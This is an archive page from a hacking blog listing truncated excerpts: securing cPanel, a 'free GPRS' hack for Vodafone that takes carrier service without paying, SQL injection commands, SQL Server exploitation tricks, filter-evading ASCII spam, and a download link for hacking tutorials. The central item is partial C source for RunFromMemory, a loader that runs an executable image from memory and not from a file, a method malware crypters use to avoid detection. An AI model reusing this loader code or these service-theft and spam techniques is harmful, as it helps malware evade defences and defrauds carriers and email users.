Archive for

SECURING CPANEL - WHM - AND ROOT on a VPS

Hope this helps you to secure your hard work from hackers;
SECURING CPANEL - WHM - AND ROOT on a VPS
Checking For FormMail
=========================================
Form mail is used by hackers to send out spam email, by relay and injection methods. If you are using matts script or a version of it, you may be in jeopardy.
Command to find [...]

Modify Your CD-ROM to Watch DVD Movies

There are two types of CD-ROM drives we can mod:
24x to 40x
40x or higher
Drives slower than 24x are too old to be modded.
24x to 40x CD ROMs
Laser Head Adjustments:
The track pitch of CDs is 1.6 microns, and the track pitch of DVDs is only 0.8 microns. The minimum length of track pits of CDs is [...]

Vodafone Hack for Free GPRS

I have been asked by many Vodafone Users to post a Method to get a free GPRS for the Vodafone. Nobody wants to pay for what he/she uses. I am also a Nobody so I was also in trying out all the things to get free GPRS for Vodafone users since I am also a [...]

SQL Commands (usefull for injection) Part 1

Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions.
On their own they wont exploit anything but eventually youl find an exploit that needs these and they are good to know for injection or just to better understand how SQL [...]

Run Program From Memory And Not File

void RunFromMemory(char* pImage,char* pPath)
{
DWORD dwWritten = 0;
DWORD dwHeader = 0;
DWORD dwImageSize = 0;
DWORD dwSectionCount = 0;
DWORD dwSectionSize = 0;
DWORD firstSection = 0;
DWORD previousProtection = 0;
DWORD jmpSize = 0;
IMAGE_NT_HEADERS INH;
IMAGE_DOS_HEADER IDH;
IMAGE_SECTION_HEADER Sections[1000];
PROCESS_INFORMATION peProcessInformation;
STARTUPINFO peStartUpInformation;
CONTEXT pContext;
char* pMemory;
char* pFile;
memcpy(&IDH,pImage,sizeof(IDH));
memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));
dwImageSize = INH.OptionalHeader.SizeOfImage;
pMemory = (char*)malloc(dwImageSize);
memset(pMemory,0,dwImageSize);
pFile = pMemory;
dwHeader = INH.OptionalHeader.SizeOfHeaders;
firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);
memcpy(pFile,pImage,dwHeader);
if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
{
jmpSize = INH.OptionalHeader.SizeOfHeaders;
}
else
{
jmpSize = INH.OptionalHeader.SizeOfHeaders / [...]

Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the [...]

Newest method of spamming that cannot be stopped:ASCII Spam

An old computer art form is making a comeback as a newer way to evade spam filters.
For decades, computing fans have enjoyed a form of expression called ASCII art that shows pictures or messages as a low-resolution graphic, a grid made of numerous computer characters encoded with the venerable ASCII standard. With a photo digitized [...]

Turn Your Mobile Cam Into WEBCAM

If Guys don’t have a Web Camera and Still want to chat with friends on Yahoo and Skype then have a look at what we have got for you.
If you have a s60 Nokia Cell Phone with Camera you can use it like your Web Camera. The SmartCAM Application connect the PC to your mobile [...]

Hackers using antivirus to sneak into computers

If you are using AVG, F-Secure (F-Prot), Sophos, ClamAV, BitDefender, Avast or any such easy-to-download antivirus software for your PC,
it’s time you sat up and took notice. An information security company set up by IIT Kharagpur engineers has found hackers using these antiviruses to break into the system.
“An attacker first crafts an email with malicious [...]

200 Best Hacking Tutorials

Hacking-Truths.net

http://depositfiles.com/files/ubdjayg2l